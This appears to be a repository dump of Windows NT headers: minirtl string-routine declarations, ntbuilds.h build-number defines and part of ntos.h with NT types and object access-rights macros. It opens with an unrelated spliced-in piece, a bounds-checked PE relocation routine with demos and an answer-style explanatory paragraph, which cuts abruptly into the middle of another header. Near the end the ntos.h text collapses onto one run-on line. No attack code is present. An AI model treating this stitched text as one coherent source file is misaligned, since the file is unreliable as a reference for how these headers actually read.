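/* Apply the directory at [relRva, relRva+relSize) of an image of
 * sizeOfImage bytes. Returns fixups applied, or -1 on malformed data
 * (directory or block outside the image, zero-sized block, target past end).
 * Other fixup types are skipped, as ldr.c does. */
int apply_relocations(uint8_t *image, uint32_t sizeOfImage,
                      uint32_t relRva, uint32_t relSize, uint64_t delta)
{
    uint32_t c = 0;
    int applied = 0;

    if (relRva > sizeOfImage || relSize > sizeOfImage - relRva)
        return -1;                                  /* directory outside image */

    while (c < relSize) {
        BASE_RELOCATION blk;
        uint32_t p;

        if (relSize - c < sizeof(blk))
            return -1;                              /* truncated block header */
        memcpy(&blk, image + relRva + c, sizeof(blk));
        if (blk.SizeOfBlock < sizeof(blk) || blk.SizeOfBlock > relSize - c ||
            blk.VirtualAddress > sizeOfImage)
            return -1;                              /* zero/oversized block, bad page */

        for (p = sizeof(blk); p + sizeof(uint16_t) <= blk.SizeOfBlock; p += sizeof(uint16_t)) {
            uint16_t entry;
            uint32_t target, width;

            memcpy(&entry, image + relRva + c + p, sizeof(entry));
            target = blk.VirtualAddress + (entry & 0x0fff);   /* cannot wrap: page <= sizeOfImage */
            switch (entry >> 12) {
            case REL_HIGHLOW: width = 4; break;
            case REL_DIR64:   width = 8; break;
            default:          continue;             /* ABSOLUTE padding and unhandled types */
            }
            if (target >= sizeOfImage || sizeOfImage - target < width)
                return -1;                          /* fixup would write past the image */

            if (width == 4) {
                uint32_t v; memcpy(&v, image + target, 4); v += (uint32_t)delta; memcpy(image + target, &v, 4);
            } else {
                uint64_t v; memcpy(&v, image + target, 8); v += delta; memcpy(image + target, &v, 8);
            }
            applied++;
        }
        c += blk.SizeOfBlock;
    }
    return applied;
}

/* Constructed test image (not a real PE): 0x2000 bytes, directory at RVA 0x1000
 * with one block for page 0 holding a DIR64 fixup at 0x10, a HIGHLOW fixup at
 * 0x20 and two ABSOLUTE pads. Pointer values assume a preferred base that the
 * image "missed" by delta. Returns the directory size. */
#define IMG_SIZE 0x2000
#define REL_RVA  0x1000

static uint32_t build_image(uint8_t *img)
{
    BASE_RELOCATION blk = { 0, sizeof(BASE_RELOCATION) + 4 * sizeof(uint16_t) };
    uint16_t entries[4] = { (REL_DIR64 << 12) | 0x10, (REL_HIGHLOW << 12) | 0x20, 0, 0 };
    uint64_t ptr64 = 0x140001000ULL;
    uint32_t ptr32 = 0x00401000;

    memset(img, 0, IMG_SIZE);
    memcpy(img + 0x10, &ptr64, 8);
    memcpy(img + 0x20, &ptr32, 4);
    memcpy(img + REL_RVA, &blk, sizeof(blk));
    memcpy(img + REL_RVA + sizeof(blk), entries, sizeof(entries));
    return blk.SizeOfBlock;
}

/* Well-formed directory: both fixups get delta added. Returns 1 on success. */
int demo_valid(void)
{
    uint8_t img[IMG_SIZE];
    uint32_t relSize = build_image(img);
    uint64_t v64; uint32_t v32;
    int n = apply_relocations(img, IMG_SIZE, REL_RVA, relSize, 0x10000);
    memcpy(&v64, img + 0x10, 8);
    memcpy(&v32, img + 0x20, 4);
    return (n == 2 && v64 == 0x140011000ULL && v32 == 0x00411000) ? 1 : 0;
}

/* SizeOfBlock clobbered to zero: an unchecked loop spins forever; we return -1. */
int demo_zero_block(void)
{
    uint8_t img[IMG_SIZE];
    uint32_t relSize = build_image(img), zero = 0;
    memcpy(img + REL_RVA + 4, &zero, 4);
    return apply_relocations(img, IMG_SIZE, REL_RVA, relSize, 0x10000);
}

/* Block page moved to the end of the image: fixups would land past it; -1. */
int demo_out_of_image(void)
{
    uint8_t img[IMG_SIZE];
    uint32_t relSize = build_image(img), page = IMG_SIZE;
    memcpy(img + REL_RVA, &page, 4);
    return apply_relocations(img, IMG_SIZE, REL_RVA, relSize, 0x10000);
}

int main(void)
{
    printf("valid=%d zero_block=%d out_of_image=%d\n",
           demo_valid(), demo_zero_block(), demo_out_of_image());
    return 0;
}
```

The reads and writes go through memcpy rather than casts so the example is also correct on hosts that fault on unaligned access; the project's loader uses direct pointer casts, which is fine on x86/x64. The two failure demos are the inputs a fuzzer would find first against the unchecked loop in ldr.c.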
char *_strstr_a(const char *s, const char *sub_s);
wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);

char *_strstri_a(const char *s, const char *sub_s);
wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);

char *_strchr_a(const char *s, const char ch);
wchar_t *_strchr_w(const wchar_t *s, const wchar_t ch);

// conversion of integer types to string, returning string length

size_t ultostr_a(unsigned long x, char *s);
size_t ultostr_w(unsigned long x, wchar_t *s);

size_t ultohex_a(unsigned long x, char *s);
size_t ultohex_w(unsigned long x, wchar_t *s);

size_t itostr_a(int x, char *s);
size_t itostr_w(int x, wchar_t *s);

size_t i64tostr_a(signed long long x, char *s);
size_t i64tostr_w(signed long long x, wchar_t *s);

size_t u64tostr_a(unsigned long long x, char *s);
size_t u64tostr_w(unsigned long long x, wchar_t *s);

size_t u64tohex_a(unsigned long long x, char *s);
size_t u64tohex_w(unsigned long long x, wchar_t *s);

// string to integers conversion

unsigned long strtoul_a(char *s);
unsigned long strtoul_w(wchar_t *s);

unsigned long long strtou64_a(char *s);
unsigned long long strtou64_w(wchar_t *s);

unsigned long hextoul_a(char *s);
unsigned long hextoul_w(wchar_t *s);

int strtoi_a(char *s);
int strtoi_w(wchar_t *s);

signed long long strtoi64_a(char *s);
signed long long strtoi64_w(wchar_t *s);

unsigned long long hextou64_a(char *s);
unsigned long long hextou64_w(wchar_t *s);

/* =================================== */

#ifdef UNICODE
#define _strend     _strend_w
#define _strcpy     _strcpy_w
#define _strcat     _strcat_w
#define _strlen     _strlen_w
#define _strncpy    _strncpy_w
#define _strcpyn    _strcpyn_w
#define _strcmp     _strcmp_w
#define _strncmp    _strncmp_w
#define _strcmpi    _strcmpi_w
#define _strncmpi   _strncmpi_w
#define _strstr     _strstr_w
#define _strstri    _strstri_w
#define _strchr     _strchr_w
#define ultostr     ultostr_w
#define ultohex     ultohex_w
#define itostr      itostr_w
#define i64tostr    i64tostr_w
#define u64tostr    u64tostr_w
#define u64tohex    u64tohex_w
#define _strtoul    strtoul_w
#define hextoul     hextoul_w
#define strtoi      strtoi_w
#define strtoi64    strtoi64_w
#define strtou64    strtou64_w
#define hextou64    hextou64_w
#else // ANSI
#define _strend     _strend_a
#define _strcpy     _strcpy_a
#define _strcat     _strcat_a
#define _strlen     _strlen_a
#define _strncpy    _strncpy_a
#define _strcpyn    _strcpyn_a
#define _strcmp     _strcmp_a
#define _strncmp    _strncmp_a
#define _strcmpi    _strcmpi_a
#define _strncmpi   _strncmpi_a
#define _strstr     _strstr_a
#define _strstri    _strstri_a
#define _strchr     _strchr_a
#define ultostr     ultostr_a
#define ultohex     ultohex_a
#define itostr      itostr_a
#define i64tostr    i64tostr_a
#define u64tostr    u64tostr_a
#define u64tohex    u64tohex_a
#define _strtoul    strtoul_a
#define hextoul     hextoul_a
#define strtoi      strtoi_a
#define strtoi64    strtoi64_a
#define strtou64    strtou64_a
#define hextou64    hextou64_a
#endif

#endif /* _MINIRTL_ */

================================================
FILE: Source/Shared/ntos/ntbuilds.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2021 - 2025
*
*  TITLE:       NTBUILDS.H
*
*  VERSION:     1.28
*
*  DATE:        18 Sep 2025
*
*  Windows NT builds definition file.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

//
// Defines for Major Windows NT release builds
//

// Windows 7 RTM
#define NT_WIN7_RTM             7600

// Windows 7 SP1
#define NT_WIN7_SP1             7601

// Windows 8 RTM
#define NT_WIN8_RTM             9200

// Windows 8.1
#define NT_WIN8_BLUE            9600

// Windows 10 TH1
#define NT_WIN10_THRESHOLD1     10240

// Windows 10 TH2
#define NT_WIN10_THRESHOLD2     10586

// Windows 10 RS1
#define NT_WIN10_REDSTONE1      14393

// Windows 10 RS2
#define NT_WIN10_REDSTONE2      15063

// Windows 10 RS3
#define NT_WIN10_REDSTONE3      16299

// Windows 10 RS4
#define NT_WIN10_REDSTONE4      17134

// Windows 10 RS5
#define NT_WIN10_REDSTONE5      17763

// Windows 10 19H1
#define NT_WIN10_19H1           18362

// Windows 10 19H2
#define NT_WIN10_19H2           18363

// Windows 10 20H1
#define NT_WIN10_20H1           19041

// Windows 10 20H2
#define NT_WIN10_20H2           19042

// Windows 10 21H1
#define NT_WIN10_21H1           19043

// Windows 10 21H2
#define NT_WIN10_21H2           19044

// Windows 10 22H2
#define NT_WIN10_22H2           19045

// Windows Server 2022
#define NT_WINSRV_21H1          20348

// Windows 11 21H2
#define NT_WIN11_21H2           22000

// Windows 11 22H2
#define NT_WIN11_22H2           22621

// Windows 11 23H2
#define NT_WIN11_23H2           22631

// Windows 11 24H2
#define NT_WIN11_24H2           26100

// Windows 11 25H2
#define NT_WIN11_25H2           26200

// Windows 11 Active Development Branch
#define NT_WIN11_ADB            27943

================================================
FILE: Source/Shared/ntos/ntos.h
================================================
/************************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2025
*  Translated from Microsoft sources/debugger or mentioned elsewhere.
*
*  TITLE:       NTOS.H
*
*  VERSION:     1.237
*
*  DATE:        22 Aug 2025
*
*  Common header file for the ntos API functions and definitions.
*
*  Only projects required API/definitions.
*
*  Depends on: Windows.h
*              NtStatus.h
*
*  Include:    Windows.h
*              NtStatus.h
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
************************************************************************************/

#if defined (_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

#pragma warning(push)
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int

#ifndef NTOS_RTL
#define NTOS_RTL

//
// NTOS_RTL HEADER BEGIN
//

//
// Enable LIST_ENTRY macros.
//
#define NTOS_ENABLE_LIST_ENTRY_MACRO

#if defined(__cplusplus)
#ifndef MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS
#define MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS 0
#endif
extern "C" {
#endif

#pragma comment(lib, "ntdll.lib")

#ifndef PAGE_SIZE
#define PAGE_SIZE 0x1000ull
#endif

#ifndef ABSOLUTE_TIME
#define ABSOLUTE_TIME(wait) (wait)
#endif

#ifndef RELATIVE_TIME
#define RELATIVE_TIME(wait) (-(wait))
#endif

#ifndef NANOSECONDS
#define NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L)
#endif

#ifndef MICROSECONDS
#define MICROSECONDS(micros) (((signed __int64)(micros)) * NANOSECONDS(1000L))
#endif

#ifndef MILLISECONDS
#define MILLISECONDS(milli) (((signed __int64)(milli)) * MICROSECONDS(1000L))
#endif

#ifndef SECONDS
#define SECONDS(seconds) (((signed __int64)(seconds)) * MILLISECONDS(1000L))
#endif

#ifndef POI //poi-poi
#define POI(addr) *(ULONG *)(addr)
#endif

typedef char CCHAR;
typedef unsigned char UCHAR;
typedef CCHAR KPROCESSOR_MODE;
typedef UCHAR KIRQL;
typedef KIRQL *PKIRQL;
typedef ULONG CLONG;
typedef LONG KPRIORITY;
typedef short CSHORT;
typedef ULONGLONG REGHANDLE, *PREGHANDLE;
typedef PVOID *PDEVICE_MAP;
typedef PVOID PHEAD;
typedef PVOID PEJOB;
typedef PVOID PKTHREAD;
typedef struct _IO_TIMER* PIO_TIMER;
typedef LARGE_INTEGER PHYSICAL_ADDRESS;
typedef struct _EJOB* PESILO;

#ifndef _WIN32_WINNT_WIN10
#define _WIN32_WINNT_WIN10 0x0A00
#endif

#if (_WIN32_WINNT < _WIN32_WINNT_WIN10)
typedef PVOID PMEM_EXTENDED_PARAMETER;
#endif

#ifndef IN_REGION
#define IN_REGION(x, Base, Size) ( \
    (((ULONG_PTR)(Base) + (ULONG_PTR)(Size)) > (ULONG_PTR)(Base)) && \
    /* x within [Base, Base+Size) */ \
    (((ULONG_PTR)(x) >= (ULONG_PTR)(Base)) && ((ULONG_PTR)(x) < ((ULONG_PTR)(Base) + (ULONG_PTR)(Size)))))
#endif

#define PE_SIGNATURE_SIZE 4

#ifndef RTL_MEG
#define RTL_MEG (1024UL * 1024UL)
#endif

#ifndef RTLP_IMAGE_MAX_DOS_HEADER
#define RTLP_IMAGE_MAX_DOS_HEADER (256UL * RTL_MEG)
#endif

#ifndef MM_SIZE_OF_LARGEST_IMAGE
#define MM_SIZE_OF_LARGEST_IMAGE ((ULONG)0x77000000)
#endif

#ifndef MM_MAXIMUM_IMAGE_HEADER
#define MM_MAXIMUM_IMAGE_HEADER (2 * PAGE_SIZE)
#endif

#ifndef MM_MAXIMUM_IMAGE_SECTIONS
#define MM_MAXIMUM_IMAGE_SECTIONS                       \
    ((MM_MAXIMUM_IMAGE_HEADER - (PAGE_SIZE + sizeof(IMAGE_NT_HEADERS))) /  \
        sizeof(IMAGE_SECTION_HEADER))
#endif

//
// Define alignment macros to align structure sizes and pointers up and down.
//

#ifndef ALIGN_UP_TYPE
#define ALIGN_UP_TYPE(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))
#endif

#ifndef ALIGN_UP
#define ALIGN_UP(Address, Type) ALIGN_UP_TYPE(Address, sizeof(Type))
#endif

#ifndef ALIGN_DOWN_TYPE
#define ALIGN_DOWN_TYPE(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))
#endif

#ifndef ALIGN_DOWN
#define ALIGN_DOWN(Address, Type) ALIGN_DOWN_TYPE(Address, sizeof(Type))
#endif

#ifndef ALIGN_UP_BY
#define ALIGN_UP_BY(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))
#endif

#ifndef ALIGN_DOWN_BY
#define ALIGN_DOWN_BY(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))
#endif

#ifndef ALIGN_UP_POINTER_BY
#define ALIGN_UP_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_UP_BY(Pointer, Align))
#endif

#ifndef ALIGN_DOWN_POINTER_BY
#define ALIGN_DOWN_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_DOWN_BY(Pointer, Align))
#endif

#ifndef ALIGN_UP_POINTER
#define ALIGN_UP_POINTER(Pointer, Type) ((PVOID)ALIGN_UP(Pointer, Type))
#endif

#ifndef ALIGN_DOWN_POINTER
#define ALIGN_DOWN_POINTER(Pointer, Type) ((PVOID)ALIGN_DOWN(Pointer, Type))
#endif

#ifndef ARGUMENT_PRESENT
#define ARGUMENT_PRESENT(ArgumentPointer) (\
    (CHAR *)((ULONG_PTR)(ArgumentPointer)) != (CHAR *)(NULL) )
#endif

#ifndef LOGICAL
#define LOGICAL ULONG
#endif

#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
#define ZwCurrentProcess() NtCurrentProcess()
#define NtCurrentThread() ((HANDLE)(LONG_PTR)-2)
#define ZwCurrentThread() NtCurrentThread()
#define NtCurrentSession() ((HANDLE)(LONG_PTR)-3)
#define ZwCurrentSession() NtCurrentSession()

//Valid Only for Windows 8+
#define NtCurrentProcessToken() ((HANDLE)(LONG_PTR)-4)
#define NtCurrentThreadToken() ((HANDLE)(LONG_PTR)-5)
#define NtCurrentThreadEffectiveToken() ((HANDLE)(LONG_PTR)-6) //GetCurrentThreadEffectiveToken

enum _KPROCESSOR_MODE {
    KernelMode = 0,
    UserMode,
    MaximumMode
};

//
// ntdef.h begin
//
#ifndef RTL_CONSTANT_STRING
char _RTL_CONSTANT_STRING_type_check(const void *s);
#define _RTL_CONSTANT_STRING_remove_const_macro(s) (s)
#define RTL_CONSTANT_STRING(s) \
{ \
    sizeof( s ) - sizeof( (s)[0] ), \
    sizeof( s ) / sizeof(_RTL_CONSTANT_STRING_type_check(s)), \
    _RTL_CONSTANT_STRING_remove_const_macro(s) \
}
#endif

#ifndef RTL_CONSTANT_OBJECT_ATTRIBUTES
#define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \
    { sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL }
#endif

// This synonym is more appropriate for initializing what isn't actually const.
#ifndef RTL_INIT_OBJECT_ATTRIBUTES
#define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a)
#endif
//
// ntdef.h end
//

#ifndef RtlOffsetToPointer
#define RtlOffsetToPointer(Base, Offset)  ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset))  ))
#endif

#ifndef RtlPointerToOffset
#define RtlPointerToOffset(Base, Pointer)  ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base))  ))
#endif

//
// Valid values for the OBJECT_ATTRIBUTES.Attributes field
//
#define OBJ_INHERIT                         0x00000002L
#define OBJ_PERMANENT                       0x00000010L
#define OBJ_EXCLUSIVE                       0x00000020L
#define OBJ_CASE_INSENSITIVE                0x00000040L
#define OBJ_OPENIF                          0x00000080L
#define OBJ_OPENLINK                        0x00000100L
#define OBJ_KERNEL_HANDLE                   0x00000200L
#define OBJ_FORCE_ACCESS_CHECK              0x00000400L
#define OBJ_IGNORE_IMPERSONATED_DEVICEMAP   0x00000800L
#define OBJ_DONT_REPARSE                    0x00001000L
#define OBJ_VALID_ATTRIBUTES                0x00001FF2L

#define OBJ_PROTECT_CLOSE                   0x00000001L
#define OBJ_AUDIT_OBJECT_CLOSE              0x00000004L

//
// Callback Object Rights
//
#define CALLBACK_MODIFY_STATE 0x0001
#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE )

//
// CompositionSurface Access Rights
//
#ifndef COMPOSITIONSURFACE_READ
#define COMPOSITIONSURFACE_READ 0x0001L
#endif
#ifndef COMPOSITIONSURFACE_WRITE
#define COMPOSITIONSURFACE_WRITE 0x0002L
#endif
#ifndef COMPOSITIONSURFACE_ALL_ACCESS
#define COMPOSITIONSURFACE_ALL_ACCESS (COMPOSITIONSURFACE_READ | COMPOSITIONSURFACE_WRITE)
#endif

//
// Debug Object Access Rights
//
#define DEBUG_READ_EVENT        (0x0001)
#define DEBUG_PROCESS_ASSIGN    (0x0002)
#define DEBUG_SET_INFORMATION   (0x0004)
#define DEBUG_QUERY_INFORMATION (0x0008)
#define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\
    DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION)

//
// Directory Object Access Rights
//
#define DIRECTORY_QUERY                 (0x0001)
#define DIRECTORY_TRAVERSE              (0x0002)
#define DIRECTORY_CREATE_OBJECT         (0x0004)
#define DIRECTORY_CREATE_SUBDIRECTORY   (0x0008)
#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)

//
// Event Object Access Rights
//
#ifndef EVENT_QUERY_STATE
#define EVENT_QUERY_STATE 0x0001
#endif
#ifndef EVENT_MODIFY_STATE //SDK compatibility
#define EVENT_MODIFY_STATE 0x0002
#endif
#ifndef EVENT_ALL_ACCESS //SDK compatibility
// note the space before the parenthesis: without it this would declare a
// function-like macro and fail to preprocess whenever the SDK does not define it
#define EVENT_ALL_ACCESS (EVENT_QUERY_STATE | EVENT_MODIFY_STATE | STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE)
#endif

//
// EventPair Object Access Rights
//
#define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE)

//
// I/O Completion Object Access Rights
//
#define IO_COMPLETION_QUERY_STATE   0x0001
#define IO_COMPLETION_MODIFY_STATE  0x0002
#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)

//
// KeyedEvent Object Access Rights
//
#define KEYEDEVENT_WAIT 0x0001
#define KEYEDEVENT_WAKE 0x0002
#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE)

//
// Mutant Object Access Rights
//
#ifndef MUTANT_QUERY_STATE //SDK compatibility
#define MUTANT_QUERY_STATE 0x0001
#endif
#ifndef MUTANT_ALL_ACCESS //SDK compatibility
#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE)
#endif

//
// Port Object Access Rights
//
#define PORT_CONNECT (0x0001)
#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | PORT_CONNECT)

//
// Filter Port Access Rights
//
#define FLT_PORT_CONNECT 0x0001
#define FLT_PORT_ALL_ACCESS (FLT_PORT_CONNECT|STANDARD_RIGHTS_ALL)

//
// Profile Object Access Rights
//
#define PROFILE_CONTROL (0x0001)
#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL)

//
// Semaphore Object Access Rights
//
#ifndef SEMAPHORE_QUERY_STATE //SDK compatibility
#define SEMAPHORE_QUERY_STATE 0x0001
#endif
#ifndef SEMAPHORE_MODIFY_STATE //SDK compatibility
#define SEMAPHORE_MODIFY_STATE 0x0002
#endif
#ifndef SEMAPHORE_ALL_ACCESS //SDK compatibility
#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|SEMAPHORE_QUERY_STATE|SEMAPHORE_MODIFY_STATE)
#endif

//
// Time Object Access rights
//
#ifndef TIMER_QUERY_STATE
#define TIMER_QUERY_STATE 0x0001
#endif
#ifndef TIMER_MODIFY_STATE
#define TIMER_MODIFY_STATE 0x0002
#endif
#ifndef TIMER_ALL_ACCESS
#define TIMER_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|TIMER_QUERY_STATE|TIMER_MODIFY_STATE)
#endif

//
// SymbolicLink Object Access Rights
//
#define SYMBOLIC_LINK_QUERY 0x0001
#define SYMBOLIC_LINK_SET 0x0002
#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYMBOLIC_LINK_QUERY)
#define SYMBOLIC_LINK_ALL_ACCESS_EX (STANDARD_RIGHTS_REQUIRED | 0xFFFF)

//
// Thread Object Access Rights
//
#define THREAD_ALERT (0x0004)

#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED        0x00000001
#define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH      0x00000002
#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER      0x00000004
#define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010
#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET  0x00000020
#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE   0x00000040
#define THREAD_CREATE_FLAGS_INITIAL_THREAD          0x00000080

//
// Worker Factory Object Access Rights
//
#define WORKER_FACTORY_RELEASE_WORKER       0x0001
#define WORKER_FACTORY_WAIT                 0x0002
#define WORKER_FACTORY_SET_INFORMATION      0x0004
#define WORKER_FACTORY_QUERY_INFORMATION    0x0008
#define WORKER_FACTORY_READY_WORKER         0x0010
#define WORKER_FACTORY_SHUTDOWN             0x0020

#define WORKER_FACTORY_ALL_ACCESS ( \
    STANDARD_RIGHTS_REQUIRED | \
    WORKER_FACTORY_RELEASE_WORKER | \
    WORKER_FACTORY_WAIT | \
    WORKER_FACTORY_SET_INFORMATION
| \ WORKER_FACTORY_QUERY_INFORMATION | \ WORKER_FACTORY_READY_WORKER | \ WORKER_FACTORY_SHUTDOWN \ ) // // Type Object Access Rights // #define OBJECT_TYPE_CREATE (0x0001) #define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | OBJECT_TYPE_CREATE) // // WMI Object Access Rights // #define WMIGUID_QUERY 0x0001 #define WMIGUID_SET 0x0002 #define WMIGUID_NOTIFICATION 0x0004 #define WMIGUID_READ_DESCRIPTION 0x0008 #define WMIGUID_EXECUTE 0x0010 #define TRACELOG_CREATE_REALTIME 0x0020 #define TRACELOG_CREATE_ONDISK 0x0040 #define TRACELOG_GUID_ENABLE 0x0080 #define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100 #define TRACELOG_LOG_EVENT 0x0200 // used on Vista and greater #define TRACELOG_CREATE_INPROC 0x0200 // used pre-Vista #define TRACELOG_ACCESS_REALTIME 0x0400 #define TRACELOG_REGISTER_GUIDS 0x0800 #define TRACELOG_JOIN_GROUP 0x1000 // // Memory Partition Object Access Rights // #ifndef MEMORY_PARTITION_QUERY_ACCESS #define MEMORY_PARTITION_QUERY_ACCESS 0x0001 #define MEMORY_PARTITION_MODIFY_ACCESS 0x0002 #define MEMORY_PARTITION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | \ SYNCHRONIZE | \ MEMORY_PARTITION_QUERY_ACCESS | \ MEMORY_PARTITION_MODIFY_ACCESS) #endif // // Define special ByteOffset parameters for read and write operations // #ifndef FILE_WRITE_TO_END_OF_FILE #define FILE_WRITE_TO_END_OF_FILE 0xffffffff #endif #ifndef FILE_USE_FILE_POINTER_POSITION #define FILE_USE_FILE_POINTER_POSITION 0xfffffffe #endif #ifndef FILE_SHARE_VALID_FLAGS #define FILE_SHARE_VALID_FLAGS FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE #endif // // This is the maximum MaximumLength for a UNICODE_STRING. 
// #ifndef MAXUSHORT #define MAXUSHORT 0xffff #endif #ifndef MAX_USTRING #define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) ) #endif typedef struct _EX_RUNDOWN_REF { union { ULONG Count; PVOID Ptr; }; } EX_RUNDOWN_REF, *PEX_RUNDOWN_REF; #ifdef _WIN64 #define MAX_FAST_REFS 15 #else #define MAX_FAST_REFS 7 #endif typedef struct _EX_FAST_REF { union { PVOID Object; #if defined (_WIN64) ULONG_PTR RefCnt : 4; #else ULONG_PTR RefCnt : 3; #endif ULONG_PTR Value; }; } EX_FAST_REF, *PEX_FAST_REF; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef const UNICODE_STRING *PCUNICODE_STRING; #ifndef STATIC_UNICODE_STRING #define STATIC_UNICODE_STRING(string, value) \ static UNICODE_STRING string = { sizeof(value) - sizeof(WCHAR), sizeof(value), value }; #endif typedef struct _STRING { USHORT Length; USHORT MaximumLength; PCHAR Buffer; } STRING; typedef STRING *PSTRING; typedef STRING ANSI_STRING; typedef PSTRING PANSI_STRING; typedef STRING OEM_STRING; typedef PSTRING POEM_STRING; typedef CONST STRING* PCOEM_STRING; typedef CONST char *PCSZ; typedef struct _CSTRING { USHORT Length; USHORT MaximumLength; CONST char *Buffer; } CSTRING; typedef CSTRING *PCSTRING; #define ANSI_NULL ((CHAR)0) typedef STRING CANSI_STRING; typedef PSTRING PCANSI_STRING; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES; typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES; typedef struct _IO_STATUS_BLOCK { union { NTSTATUS Status; PVOID Pointer; } DUMMYUNIONNAME; ULONG_PTR Information; } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; #ifndef INTERFACE_TYPE typedef enum _INTERFACE_TYPE { InterfaceTypeUndefined = -1, Internal = 0, Isa, Eisa, MicroChannel, TurboChannel, PCIBus, VMEBus, NuBus, PCMCIABus, CBus, MPIBus, MPSABus, ProcessorInternal, InternalPowerBus, PNPISABus, PNPBus, Vmcs, 
ACPIBus, MaximumInterfaceType } INTERFACE_TYPE, * PINTERFACE_TYPE; #endif /* ** FileCache and MemoryList START */ typedef enum _SYSTEM_MEMORY_LIST_COMMAND { MemoryCaptureAccessedBits, MemoryCaptureAndResetAccessedBits, MemoryEmptyWorkingSets, MemoryFlushModifiedList, MemoryPurgeStandbyList, MemoryPurgeLowPriorityStandbyList, MemoryCommandMax } SYSTEM_MEMORY_LIST_COMMAND; typedef struct _SYSTEM_FILECACHE_INFORMATION { SIZE_T CurrentSize; SIZE_T PeakSize; ULONG PageFaultCount; SIZE_T MinimumWorkingSet; SIZE_T MaximumWorkingSet; SIZE_T CurrentSizeIncludingTransitionInPages; SIZE_T PeakSizeIncludingTransitionInPages; ULONG TransitionRePurposeCount; ULONG Flags; } SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION; /* ** FileCache and MemoryList END */ /* ** Processes START */ typedef struct _SYSTEM_TIMEOFDAY_INFORMATION { LARGE_INTEGER BootTime; LARGE_INTEGER CurrentTime; LARGE_INTEGER TimeZoneBias; ULONG TimeZoneId; ULONG Reserved; ULONGLONG BootTimeBias; ULONGLONG SleepTimeBias; } SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION; typedef enum _THREAD_STATE { StateInitialized, StateReady, StateRunning, 